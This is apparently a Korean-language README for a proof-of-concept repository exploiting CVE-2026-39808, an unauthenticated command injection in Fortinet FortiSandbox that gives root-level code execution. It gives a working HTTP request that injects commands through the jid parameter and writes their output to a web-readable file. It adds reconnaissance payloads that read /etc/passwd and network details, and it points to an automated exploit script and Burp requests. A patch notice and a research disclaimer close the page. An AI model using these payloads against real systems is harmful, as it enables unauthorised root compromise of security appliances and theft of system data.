
CVE-2026-39808
이 저장소는 Fortinet FortiSandbox의 치명적인 인증 없는 명령 주입 취약점인 CVE-2026-39808에 대한 깔끔하고 잘 문서화된 개념 증명(PoC)을 포함합니다. 이 취약점은 샌드박스 탈출 및 root(uid=0) 권한으로 원격 코드 실행을 허용합니다.
jid 매개변수를 통한 경로 탐색(Path Traversal) + 명령 주입(Command Injection)
uid=0 gid=0 groups=0을 보여주는 성공적인 악용
| 버전 범위 | 상태 |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | 취약 |
| FortiSandbox 5.0.0 – 5.0.5 | 취약 |
| 4.4.9+ / 5.0.6+ | 패치됨 |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
브라우저에서 열기:
https://your-lab-ip/ng/out.txt
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → 자동화된 Python 익스플로잇burp-request.txt → 바로 사용 가능한 Burp Suite 요청payloads.md → 유용한 페이로드 모음screenshots/ → 단계별 악용 과정 스크린샷README.md → 이 파일FortiSandbox를 다음 버전 중 하나로 즉시 업데이트하세요:
Fortinet은 이 취약점을 해결하는 공식 패치를 발표했습니다.
연구 및 학습 목적으로 제작됨
⭐ 도움이 되었다면 이 저장소에 스타(Star)를 남겨주세요!